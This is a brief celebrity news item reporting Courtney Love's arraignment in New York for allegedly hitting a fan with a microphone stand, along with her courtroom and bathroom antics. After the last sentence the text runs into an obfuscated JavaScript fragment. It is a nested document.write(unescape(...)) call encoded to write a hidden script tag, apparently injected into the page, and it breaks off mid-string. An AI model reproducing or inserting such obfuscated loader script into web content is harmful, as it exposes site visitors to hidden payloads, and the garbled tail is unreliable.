Courtney Love has appeared in court again, this time showing up late and holding an impromptu press conference in a bathroom.
Love was arraigned yesterday in New York on charges of assault and reckless endangerment for allegedly hitting a fan with a microphone stand during a concert on March 18th. Love showed up to court nearly two hours late, wearing a pink dress over pink pants and with smeared lipstick. She pleaded innocent, and the case was adjourned until June 28th.
After a swarm of reporters followed her into the bathroom, where she gave a stream-of-consciousness commentary. Among the topics she touched on were Russell Crowe, her daughter, her ex-boyfriend Jim Barber, and Dave Grohl and Krist Novoselic. Love interrupted her monologue a few times to sign autographs. When a courtroom artist asked her to sign her sketch of the morning's hearing, Love scribbled a mustache and dark hair on her picture.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
